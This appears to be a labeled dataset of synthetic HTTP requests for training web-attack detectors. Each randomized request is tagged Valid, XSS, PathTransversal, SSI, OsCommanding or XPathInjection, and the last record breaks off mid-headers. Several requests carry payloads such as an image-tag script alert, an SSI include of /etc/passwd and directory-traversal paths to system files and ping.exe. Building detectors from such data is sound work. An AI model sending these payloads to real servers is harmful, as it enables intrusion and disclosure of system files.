GET /rsdk9io2ftndt/dhqN1sasvr/WQ9nVwsgLy7/syll7yYcCT0JkUV8yPr/6meelnoirny/rXOluAykv14E31WpvG.tiff?oOc2=5&tti0ecor6oEB=4419&rnnfaecyf=an5ilt0L&aubslEjweUlouh=353215 HTTP/1.1
Host: 135.132.95.212
Connection: keep-alive
Accept: application/*;q=0.6, text/xml;q=0.9, application/postscript
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.9, gzip;q=0.1, gzip, gzip;q=0.0, compress;q=0.1
Accept-Language: oh-rpsleb;q=0.2, eaeclm-sl7qi;q=0.6, oln-gunl, s-Ua
Cache-Control: min-fresh=47
Client-ip: 241.218.51.172
Cookie: ltnmd=059;GzjLJ=jtidracceptt/;ET9OfiLtKxd='d;z56nmueusTvtt=t x%Vrats;esutp=r;ee4o=Lrwda
Cookie2: $Version="078"
Date: Tue, 23 Dec 08 01:19:03 CET
ETag: W/"@SwYjNEfjZMf_Kh4ulGE"
Expect: sbmyjz=nf9bml;nyae
From: d011d@jsutlttae.it
If-Modified-Since: Wed, 19 Jul 06 18:07:44 GMT
If-Unmodified-Since: Sat, 22 Jul 06 01:39:54 GMT
If-Match: "fuzcjQOvwRlxBHarH1"
If-None-Match: "yQQiE1UwvA45b3kR"
If-Range: *
Max-Forwards: 298
MIME-Version: 3.1
Pragma: he='o0a'
Proxy-Authorization: NTLM dGZtU3JiZGludDNZeW5pZWFkb3d5QXRiYTByemVzdDlzcGxpdmVuaWhsVGU=
Authorization: sEqw n4ia=eih7
Range: -237,00-,0218-17
Referer: /dfauh/emteteea/rSre.pdf
TE: chunked;q=0.7,gzip;q=0.2,trailers
Trailer: Connection
User-Agent: Mozilla/4.3 (compatible; MSIE 0.4; Mac OS X; awgk; ttteon; o07clNa)
UA-CPU: x86
UA-Disp: 289,3069,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 308x307
Via: 7.2 www.avmwhan.tiff, HTTP/9.4 www.34esoUn.jpg:4
Transfer-Encoding: deflate
Upgrade: de7/0.8, frcre/7.5
Warning: 328 40.44.180.235:467 "waPoatoStfremrctoitm" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 2430605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20940
Start - Id: 5334
class: Valid
POST /3in6Tgp0apa/Eeedaeo6rhdlele/iF/p5qCdadPWa/eqHk/Ie0xdstdMni/tb2i.exe? HTTP/1.0
Content-Length: 108
Content-Language: hkt,difd,0fa
Content-Encoding: deflate
Content-Location: http://www.csz5.it/imt5/a1cssul/5sllg.swf
Content-MD5: amlpeU92aTd0akFzVXdFaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Mar 05 17:14:04 UTC
Last-Modified: Tue, 03 Nov 09 01:31:52 UTC
Host: 234.23.254.72
Connection: Sce6
Accept: audio/x-wav
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: ce-al7a, aAiIaht-olwb;q=0.5
Cache-Control: oaa111='lmo'
Client-ip: 225.208.7.131
Cookie: tthda=shteehm$fid;ti=U+
Cookie2: $Version="847"
Date: Sat, 28 Jul 07 12:18:17 CET
ETag: W/"TrLLp2DSFY6tfXnbJee"
Expect: 100-continue
From: rfnrLte@nf1er.st
If-Modified-Since: Tue, 09 Jun 09 23:54:54 UTC
If-Unmodified-Since: Thu, 28 Dec 06 20:12:24 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 35
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: gsrht ssipEath=ehuMx69
Authorization: Digest nonce
Range: 95439-
Referer: /cua3.mdb
TE: gzip,chunked;q=0.6
Trailer: Pragma
User-Agent: t5gfet/2.7
UA-CPU: Sparc
UA-Disp: 7479,767,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6579x971
Via: 9.0 53.157.219.227, 9.2 www.irtduaNa.jpeg
Transfer-Encoding: gzip
Upgrade: ici/8.0
Warning: 447 www.AoiT.html "ellptootAlwpn4" "Thu, 03 Mar 05 11:10:59 GMT"
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 0742335633125
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

landsD-b=\2Y~tao&ye1rtOe=tsohaszswgsIaa&bsIchildWJminsertrB5=cy.WnPgM8ql&tod=nfhtaby&803ich=38hjs8Eewl2a

End - Id: 5334
Start - Id: 13035
class: Valid
GET /NA3USqeN5qwp-vLI/E6dlhrpege/aYAbzCfP7M/nsjmt/c9n/fx/rTersade/hK_Roio6Sa3aIZ/ox/jR.asp? HTTP/1.0
Host: www.mhunrek.it
Connection: close
Accept: text/plain, text/xml, video/*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, gzip;q=0.7
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 82.22.221.79
Cookie: @WX4=566513;imoahjne9atesf=07306781;utr=2074309624
Cookie2: $Version="923"
Date: Thu, 23 Nov 06 20:06:25 UTC
ETag: W/"OKmEAzboWCMrzGY"
Expect: 100-continue
From: isn1r@lopp9e.fr
If-Modified-Since: Sun, 03 Oct 04 07:28:37 CET
If-Unmodified-Since: Sun, 15 Mar 09 20:11:30 UTC
If-Match: "kB5FkGc9dA3Pjp6c80"
If-None-Match: *
If-Range: Mon, 01 Jun 09 06:59:36 UTC
Max-Forwards: 86
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bkdhaHVobGVzdndsZXZzZnVlU3NhZWd0ZWkxeXhpNWVuWnlhaHJpajlzbA==
Authorization: Basic bmh6bTpoZWpmTmFt
Range: 309-6,-2
Referer: /vtaeenii/Aiomde7h/HerA1.mpeg
TE: trailers,trailers,chunked;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.7 (Machintosh; U; PPC 6.8; sc-6o; rv:4.5.5) Gecko/38698149
UA-CPU: x86
UA-Disp: 5331,978,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 011x9947
Via: yloa7a/1.2 163.123.246.41
Transfer-Encoding: identity
Upgrade: ag4/9.4
Warning: 255 101.108.66.228 "edon2hsulniorc" "Sun, 25 Sep 05 11:05:11 CET"
X-Forwarded-For: 28.63.48.40
X-Serial-Number: 72290
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13035
Start - Id: 47766
class: XSS
GET /Eftgeyotoodg7s/osAvky9XONlISQ.jpg?uaraogmtat=tGrcQC&enr=npselecteotelnetcpoAet%3E%5B+dbes&asr=d2ASqMAI61q&oopm1=08&eea=%3Cimg++++src%3D+++%22++mocha%3A%5Balert+++%28%27ant95nu%27%29%3B%5D++++%22+%3E&7G7smunhhtet6I=%5Di&7eHw5hdtOcmaI=d5e8w3C-q&nhmerklhgcuew=74534&uayc5re2si=b&E3jtin1=nrin&r2qsG3oUd5skec7=tmp%5C+%24%3Bemochan4le&siirnIbSl=ah HTTP/1.0
Host: www.atinrnzes1.gov
Connection: ploe
Accept: */*;q=0.8
Accept-Charset: big5, windows-1252;q=0.7, big5, x-mac-arabic;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: l9hd-e;q=0.2, kkx-mta1, wloeeeeg-RHdt, n-b1daJ, efIeu-ylhn;q=0.3
Cache-Control: no-store
Client-ip: 226.81.74.174
Cookie: fitytSArve=tgiaat;nwaPianh=o;ntuoEbt=ruUrsu62sboteK;9Sh0J.copyxy=89091;t5CarrFah=tgo
Cookie2: $Version="49"
Date: Thu, 26 Feb 09 14:35:17 GMT
ETag: "V0Vh57R1gKYyWC."
Expect: 100-continue
From: ychumrg@eeAsehi.cz
If-Modified-Since: Mon, 17 Nov 08 16:47:17 UTC
If-Unmodified-Since: Thu, 03 Mar 05 17:48:33 CET
If-Match: "3VEZ_yjlOuFNp8f"
If-None-Match: *
If-Range: Wed, 22 Oct 08 02:04:11 CET
Max-Forwards: 72
MIME-Version: 3.5
Pragma: g8=h0T
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: Basic cm1hcndybjphQmVsbmVv
Range: 0-6,74113-
Referer: http://www.Lbei.it/e9onpepi/osdgh6ae.swf
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/5.6 (compatible; oyeeq; Linux i386; sntite)
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: HTTP/1.4 229.94.67.144, 9.8 www.shssi.htm
Transfer-Encoding: gzip
Upgrade: Hooma/8.6, 5ec/4.1, Renu/5.6, 5nddy6/0.2, alr4/7.7
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47766
Start - Id: 26428
class: Valid
GET /5sGjnullbG/gnmux04O7W9AnwF/tEhLB/p_-p@d/adtpbBlki3gh5E/ieCq@eRXWA6AGU/iXK/yeogethloane.php3?et=fsoit4ove&dlro2oo=0528&H3ehCtRFICUh=tsoemuvdeaiouAsc4A&c9lhddhewstoau=+vv&9natr9ene=+ng%3A4cte&neeeuB2tn3eunA=anmhe&erst4voyyniTiD=eeleot%5Cochildi&uorametvGgaR=%26ovbscript%27k HTTP/1.1
Host: www.htttu9At.gov
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: big5;q=0.7, x-mac-arabic;q=0.5, x-mac-greek;q=0.5, koi8-r;q=0.3, koi8-r;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: a4eltt-enefftw, wpwas-rrehloz;q=0.4, utEsb-gTiteur, dttrzo-uclo;q=0.0, eciAee-wthssfe
Cache-Control: min-fresh=88023
Client-ip: 125.19.3.94
Cookie: koe3=ecafM;mvt5ninhuui=echob;9inyeca3omnmvEu=fd;sa=rshutdown=6EzadhtE5Ho]iim;rc1ivn=cElikeevinSuikt
Cookie2: $Version="09"
Date: Mon, 25 Apr 05 13:06:56 UTC
ETag: "fK1XDGMWJ.QIP@.ZL.v"
Expect: 100-continue
From: 0vaorneD@ken7hhpNbe.st
If-Modified-Since: Mon, 26 Dec 05 02:39:15 GMT
If-Unmodified-Since: Wed, 09 Mar 05 13:17:21 GMT
If-Match: "mroAegezY6q9sl2T"
If-None-Match: *
If-Range: *
Max-Forwards: 110
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest username="tmff8btS"
Authorization: ojhn0u rsih=Vtmie
Range: 976674-,-469,33-19
Referer: /tmifyitc/ee2Rint/arrtbh/nnrd.php4
TE: trailers
Trailer: From
User-Agent: n_lq8@1sh3 http://www.ge5e.ch
UA-CPU: StrongARM
UA-Disp: 6283,1748,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0638x9966
Via: 1.8 232.183.136.83:907, iedut/8.2 www.cqtnem.shtml
Transfer-Encoding: deflate
Upgrade: lwmdc/2.7, Het/5.1
Warning: 932 www.2fd5ow1.tiff "ntrn" 
X-Forwarded-For: 59.157.184.124
X-Serial-Number: 3166594195
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26428
Start - Id: 45103
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: 162.20.150.91
Connection: toen
Accept: application/rtf;q=0.6, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e9faxh-nna5;q=0.8
Cache-Control: min-fresh=2
Client-ip: 154.211.218.131
Cookie: sedtph=3
Cookie2: $Version="1"
Date: Wed, 16 Apr 08 21:06:25 CET
ETag: "NeIswK_7a5EBHO2LNI"
Expect: cles=tnrrwes
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Sun, 21 Mar 04 21:14:23 UTC
If-Unmodified-Since: Sat, 21 May 05 16:37:33 UTC
If-Match: "@qTsqfeb1mDFCco"
If-None-Match: *
If-Range: Wed, 16 Jun 04 07:09:52 GMT
Max-Forwards: 2
MIME-Version: 4.2
Pragma: se5d='nnfSaPsE'
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: NTLM b2pNMDZlYWZvbjFqaXN1ZW1kZXJ3bmVSeWRyaWFhbWF0eGJpdHk=
Range: -3,456-488022
Referer: /g4oSe/rla7nmn.wav
TE: gzip;q=0.6,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.4 (X11; U; Unix 8.2; nv-Mv; rv:9.9.5) Gecko/07701054
UA-CPU: StrongARM
UA-Disp: 4629,539,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 213x015
Via: 2.0 91.186.196.32
Transfer-Encoding: tofrk
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45103
Start - Id: 39776
class: SSI
GET /kadxzl/38Tqmg0Ball1where8Rrcp/tuQamT22kTB5@Xsbd/na@1gq_mJ7D7HjvOxy/nrsR-W26hMIA/g0UicaPashtgeoHptsMe/j_7bodyDp/s8HA@vct6/Batuim3r3yscDyr2b.jpg?ySuZ=execed+&oBePuwaihfqchun=rggpaPrpdHs&cmn=nT.mOaR-gv&iekrehs=rexec-+dkcs&ddhptAp=%3C%21--++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E&syceukoe=rtnpttAemsd&R.UhYupdatebkconnect1k=272&tiiW=torpzet6eh&ismtzbp2o7sus=t68tYZu-Zc&adis7y9iiopoo=709906741&t8aGxo=e++Wsddeea&rrrn1NEoet9avi=+tesrpe9ztbzTe&7e1h8ts5tesyoaw=ethtg9urro HTTP/1.1
Host: www.7egnneciRb.org
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: macintosh, utf-7;q=0.6, windows-1250, x-mac-greek, iso-8859-4
Accept-Encoding: *
Accept-Language: 3oeao9r1-entc, 7nwgsi3t-bmdml;q=0.5, i2tti-net6df;q=0.4
Cache-Control: s=ttoegdh
Client-ip: 211.6.11.10
Cookie: oa=rael;atCzrd354hip=0420
Cookie2: $Version="712"
Date: Sat, 05 Jan 08 05:28:41 UTC
ETag: "m8H_3TREv-OT1yk"
Expect: ae0oP=nu1EYl;0lwbh5rr=kbremoe0
From: 6Rvlor@tljncre.cz
If-Modified-Since: Thu, 08 Jul 04 24:46:17 UTC
If-Unmodified-Since: Fri, 28 Jul 06 20:20:08 UTC
If-Match: *
If-None-Match: "Z3npkwj.LoKh@3Dm"
If-Range: Mon, 19 Nov 07 01:25:07 GMT
Max-Forwards: 419
MIME-Version: 5.1
Pragma: m=dbopbr
Proxy-Authorization: aqmos h5eilr=rpma
Authorization: Digest cnonce="aEEac"
Range: 42-82,601-32,-86
Referer: /Jlot4bh/lIar/e1zhnrt.html
TE: deflate;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.7 (compatible; MSIE 5.2; Open BSD i586; Eed0hhrn9)
UA-CPU: 68000
UA-Disp: 168,5642,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 357x4433
Via: 7.2 112.35.80.1, xalgs/1.7 www.viiycox.shtml
Transfer-Encoding: identity
Upgrade: Fcncth/8.5, tSieoY/0.0, qnbm/2.6, dla/6.1, tyuhob/1.6
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39776
Start - Id: 45799
class: PathTransversal
GET /aguyOCY.dMhVMxEJ1/JhAenoCuncet5e/zi/s5N1D/smxIei/homeqWjhjJYbodyNnED/tTzUsxcERB1v9x..L/eesaiyr8oao9etr0neR/dre5H6UOnUYcbK.php?idsian=33721706&wfixns=%5Dsy%291q%25tRenCbe&atsoertm8lh=wewee&Rr6Sc.=700&neshuhc1eo=%5Cautoexec.bat&drsts5=5&lauhs=tnbou%5Cm&tAf=oftty5 HTTP/1.1
Host: www.aHNe.uk:80
Connection: close
Accept: video/*, audio/*, image/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 89.136.143.100
Cookie: ntz7oi0s0m==s =y;rt=yOPz_;ahtemhnstos=e-ZnPrN;xZTYuH.YnetcatselectTh=eoo
Cookie2: $Version="28"
Date: Sun, 27 Feb 05 05:55:23 CET
ETag: "sOmlprG1RquyFJwp"
Expect: tsoln3r=7idtmA
From: erir5sT@dLha.org
If-Modified-Since: Wed, 19 Jul 06 24:34:04 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: "lN4y2yoNZjxbveeM5G"
If-None-Match: *
If-Range: Sun, 14 Jan 07 15:57:04 CET
Max-Forwards: 5
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ckh0ejB0a2F0aTduaXR2bHNpdG13dG9zNXJsYmxyZnk=
Authorization: Digest qop=bEneli
Range: 151606-
Referer: http://www.ui5tys.cz/Eyt4a.jpg
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.1 (X11; U; Open BSD i586 4.7; eu-aa; rv:3.4.9) Gecko/71855007
UA-CPU: x86
UA-Disp: 1489,7899,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9422x259
Via: 4.9 www.orxmrrt.jpeg:820
Transfer-Encoding: identity
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 157.18.224.28
X-Serial-Number: 06918680418533
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45799
Start - Id: 7312
class: Valid
POST /mv-Me/oeteoGnhdWeuedeh/CfH/tBmnY0rsb/niStEnggAang/er2vm4YgW_CMQraFHCOd/dmWtnYJksyKdp/ai5/ent/lepawAlj@6gm@FeN/sj9efC2EM.fwH.exe? HTTP/1.0
Content-Length: 97
Content-Language: o
Content-Encoding: compress
Content-Location: http://www.Oda8nmog.uk/cposl/ctEpblsm/hln3o.php3
Content-MD5: bGRjZWhmdGxsaExEeEVycw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Jan 06 12:15:38 GMT
Last-Modified: Sat, 06 Mar 04 12:12:19 GMT
Host: 16.85.25.20
Connection: rnecm
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: wvnal-marA
Cache-Control: no-cache
Client-ip: 10.100.202.44
Cookie: T3serxqo8Htrin=gMgTBSLh;m4r3l=ioO7;isgohlledeict=twe;stcneasi=oO.;snorcl0ielnoae=oMge;zN=|pee;
Cookie2: $Version="837"
Date: Mon, 13 Feb 06 05:48:59 UTC
ETag: "FgSztvxaqUPUoUZP"
Expect: lydn
From: ha4h@ntbt8vhFn.cz
If-Modified-Since: Mon, 04 May 09 24:54:30 CET
If-Unmodified-Since: Fri, 28 Apr 06 02:03:34 GMT
If-Match: "QZk@0MJQtECqb@AmUX"
If-None-Match: "OZ-XOo--0RnGwurmSi"
If-Range: Wed, 07 Jan 04 20:59:27 GMT
Max-Forwards: 186
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic ZXVva1BqZWE6aTBldG0=
Range: 843670-7300,78-
Referer: /t5hhHo/5tnsar8.rar
TE: trailers,chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: Mozilla/9.1 (Windows; U; Win 9x 9.8; oa-Ye; rv:6.8.6) Gecko/17148121
UA-CPU: 68000
UA-Disp: 4520,707,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1302x7380
Via: 6.0 www.eswnIAn.png
Transfer-Encoding: identity
Upgrade: Pcr/6.7, asmrbh/9.1, ayi/9.1
Warning: 465 193.0.29.240 "9tdbganttoetamdoth" 
X-Forwarded-For: 180.148.168.191
X-Serial-Number: 83189870004796915
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oaarznofe=A&snrihAsfo0noIpw=eGVSI28x&rxenAeHtbdgth29=Sm&iAqn1e4ht8aayah=b0wnnA2Inietclrq6whtpassU

End - Id: 7312
Start - Id: 9051
class: Valid
GET /kLMjm97DMT2IPek86DU/tyla8.png?ttgitsg0aei8lne=76591 HTTP/1.1
Host: 102.158.76.218:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.7, windows-1253;q=0.8, windows-874;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 168.206.47.117
Cookie: thlaebshxqer=266402664;nksehce=dm02DzLX7N;fzdal=tcikeaEhoiiesE;mi=qgYoe;YZMIxp_MHXhN=80;metawwgettSz3JtconnectV1=ye/elr6a6
Cookie2: $Version="9"
Date: Mon, 15 Sep 08 24:56:42 GMT
ETag: "KoTQ8MRH79vQlgwbG_"
Expect: mjl9tid
From: nYe8@Sqo1l5.uk
If-Modified-Since: Sat, 06 Jun 09 12:59:55 UTC
If-Unmodified-Since: Fri, 20 May 05 01:13:24 CET
If-Match: *
If-None-Match: "D189zS0Jnvs8@-ad@"
If-Range: Fri, 19 Jan 07 11:40:24 UTC
Max-Forwards: 666
MIME-Version: 8.0
Pragma: oPnNthna=raaoobl
Proxy-Authorization: Digest uri=/Otel0DNt.asp
Authorization: NTLM amw4YW1pVGhvdmNvYXY1c3N0ZFVscHhzcm5JRWloc2ppTlJua2F1ZDJycg==
Range: -9,-8753
Referer: /lbHouh1k.conf
TE: deflate
Trailer: TE
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 6.0; dg-al; rv:0.9.5) Gecko/92377667
UA-CPU: 68000
UA-Disp: 539,7615,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 842x671
Via: 7.2 111.199.3.125:4
Transfer-Encoding: tfsh6s; dodqd=EdinO72
Upgrade: oicaw0/1.6, fIvar4/1.2, iut7eu/0.8, 8nbl/3.1, 0ehUrq/7.3
Warning: 394 66.20.115.11 "wuelrtshiipI1Cr9mi" "Mon, 05 May 08 03:16:51 CET"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 442361
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9051
Start - Id: 29181
class: Valid
GET /fB3_QWcBtCdekcWdMy1.js? HTTP/1.1
Host: www.e2N2a2rtg.org
Connection: keep-alive
Accept: image/gif;q=0.7, audio/*;q=0.3, audio/*;q=0.0
Accept-Charset: iso-10646-ucs-2;q=0.9, iso-8859-3;q=0.4, x-mac-ce;q=0.8, windows-1258
Accept-Encoding: deflate;q=0.1, gzip, gzip;q=0.9, deflate;q=0.0, identity;q=0.0
Accept-Language: ipwrhbW-oHt, rHh-rt, gcMc7hs9-jtAkeE
Cache-Control: only-if-cached
Client-ip: 214.229.176.133
Cookie: _dbody4X5=ltIx2ilsai;FylJmtQR=tr
Cookie2: $Version="45"
Date: Wed, 11 Nov 09 03:57:23 UTC
ETag: "8sKNg1mC8SYEFTZU@"
Expect: 100-continue
From: hatG00@iVFLben.net
If-Modified-Since: Sat, 16 Jan 10 21:27:40 CET
If-Unmodified-Since: Wed, 11 Jun 08 19:23:33 GMT
If-Match: "F9Q8_FMgaDU_j@lCLt2"
If-None-Match: *
If-Range: "F5NSpEx_O4omEK7"
Max-Forwards: 1
MIME-Version: 6.4
Pragma: endmfr='pq'
Proxy-Authorization: Digest nc=90f0EcDe
Authorization: NTLM dHRwYjBneXNzbEF1dHN0UHlpY2NFbnJpeW5yQ2ZpdGhv
Range: -4
Referer: http://www.hvct.gov/edpnr/enxeq/thrtRnh/m1S7s/eabyi2t.jsp
TE: deflate
Trailer: If-Range
User-Agent: Mozilla/4.3 (Windows; U; Win 9x 5.0; 4e-ro; rv:4.9.4) Gecko/64775829
UA-CPU: PowerPC
UA-Disp: 2553,984,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 944x565
Via: 7.1 www.ueingzi.tiff:32, 5.7 27.44.13.117
Transfer-Encoding: ne4i; ep2aho=Ytseal8t
Upgrade: Eoyt/0.3, nnd/2.9, V3f/5.4, ceegk/2.2, AoseO/0.6
Warning: 010 www.dhr6yno.shtml "sdut2s" 
X-Forwarded-For: 253.181.198.179
X-Serial-Number: 4041973045614
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 29181
Start - Id: 43839
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.1
Host: 252.17.141.41:94
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate, identity, gzip
Accept-Language: nepeshvn-e;q=0.8, Hiel-us
Cache-Control: max-age=02
Client-ip: 34.114.34.166
Cookie: o3nra=H'o>%us5dakth
Cookie2: $Version="61"
Date: Sun, 23 Jan 05 22:31:20 UTC
ETag: "OgRXfIiZpYzKNFJj"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Sun, 01 Aug 04 24:37:47 UTC
If-Unmodified-Since: Mon, 10 Oct 05 02:19:34 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: "huLhkN8ZOfTwqzaX"
If-Range: Tue, 13 Mar 07 02:44:46 CET
Max-Forwards: 85
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: EttkN dzgo=wbabRca
Range: 653-,494-99921,2-094773
Referer: http://www.ntaGtne.cz/eUvosol/rratithE/rsyra/sieg4x.swf
TE: trailers,trailers
Trailer: Accept
User-Agent: mn1t (uwEM_RHq-; tEeY.Vm; rbrRcB)
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6925x167
Via: 1.6 74.172.49.164:14
Transfer-Encoding: eoshG
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43839
Start - Id: 2604
class: Valid
GET /gw/tm/n28/0c/9rCeAwmeeiittsglHge/bFEo/tealoe/sAnlatcjidhFIatoh8d/IkieejMfieMOitst/h0acAxtwoO3adndlw/erphaehnewg.html?2tl8muethotagl=ei4hi7ii8eR&yyulePynes=pT9Shederi&apsAneaerseaa=wsqitbeen HTTP/1.0
Host: 74.254.117.86:80
Connection: mm1t
Accept: */*;q=0.8
Accept-Charset: hz-gb-2312;q=0.6, utf-8, iso-8859-8-i;q=0.8, iso-8859-8
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=71855
Client-ip: 11.225.10.199
Cookie: ryulimte7nohAtl=t8movaraaaiyus<h;Hane=8107;srhomeJ=58716542;oohduiswi=r0BMH;kfd=teeaad;4lecraeag=ya0yr tneese/3q
Cookie2: $Version="2"
Date: Tue, 17 Oct 06 02:26:04 UTC
ETag: W/"Odn1fMbYERnDz3JfNZL"
Expect: stixncs
From: noRet8q@IsA1lAtsho.be
If-Modified-Since: Mon, 17 Apr 06 23:39:37 GMT
If-Unmodified-Since: Sat, 18 Oct 08 11:55:20 GMT
If-Match: *
If-None-Match: *
If-Range: "31DK_Ef5u7-M2R5O4"
Max-Forwards: 029
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic YXpvaG1uOmRualRveDU=
Authorization: NTLM c2VzOG83aUVvYXJsdGVjZmVsZWZ1ZWx0bXJudHk4OVY0aW5s
Range: 358055-4261
Referer: /neUr5ote.nsf
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.7 (compatible; MSIE 6.7; Open BSD i386; dnliRe)
UA-CPU: PowerPC
UA-Disp: 5183,3355,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6037x127
Via: 7.9 www.ehgta5.jpeg:315, FTP/3.1 238.211.53.109
Transfer-Encoding: compress
Upgrade: hutie/7.1
Warning: 139 202.175.202.238:09 "if85tEa" "Sun, 03 Sep 06 18:25:51 GMT"
X-Forwarded-For: 111.117.154.17
X-Serial-Number: 9671188655936
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2604
Start - Id: 50069
class: XPathInjection
PUT /cQ74o@iVJ5A7hcii/ueW9X3d7d-yelH-qf9/di/rx/formGJj5fo/cwgn/.updateQ.js? HTTP/1.1
Content-Length: 226
Content-Language: tD,ie,OsaTea
Content-Encoding: deflate
Content-Location: /olj9EnA/sssdydre/eoTe0w/95in/aodedeq.png
Content-MD5: dnRlM2VvaXV0ZXFkb2E5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Sep 05 12:12:26 CET
Last-Modified: Fri, 30 Apr 10 02:28:22 GMT
Host: 156.122.224.155:80
Connection: 02sbi
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.2, identity;q=0.4, identity, compress;q=0.5, identity;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 149.101.44.8
